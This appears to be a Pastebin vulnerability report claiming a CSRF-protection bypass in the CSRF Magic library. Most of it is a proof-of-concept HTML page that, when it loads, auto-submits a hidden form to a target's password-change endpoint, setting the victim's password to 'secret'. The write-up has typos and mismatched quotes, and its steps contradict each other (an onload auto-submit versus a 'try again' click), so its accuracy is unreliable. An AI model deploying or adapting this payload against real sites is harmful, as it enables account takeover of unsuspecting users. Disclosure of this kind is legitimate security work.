ghost_fh

CSRF Magic Library

Nov 14th, 2019
846
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. CSRF Magic Library
  2.  
  3. Issue:- CSRF vulnerability.
  4.  
  5. Vulnerability Description :- The CSRF Magic is vulnerable to CSRF protection bypass. Due to this flaw an remote attacker can exploit this vulnerability by
  6. crafting the malicious page and disperses it to the victim via social engineering ways enticing them to
  7. click the link. Once the user/victim clicks the `try again` button, attacker can takeover the account and
  8. perform untintended actions on vitim’s behalf.
  9.  
  10. Steps to Reproduce :-
  11. 1. Create a malicious page containing the below values.
  12.  
  13. <!DOCTYPE html>
  14. <html>
  15. <body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
  16. <form id="myForm" action="https://target.com/password_change.php" method="POST">
  17. <input type=hidden name="password" value=”secret”>
  18. <input type=hidden name=”conformed_password” value="secret">
  19. </form>
  20. </body>
  21. </html>
  22.  
  23. 2. Once cliked on the "Try again" button attack will get executed by asking password change.
RAW Paste Data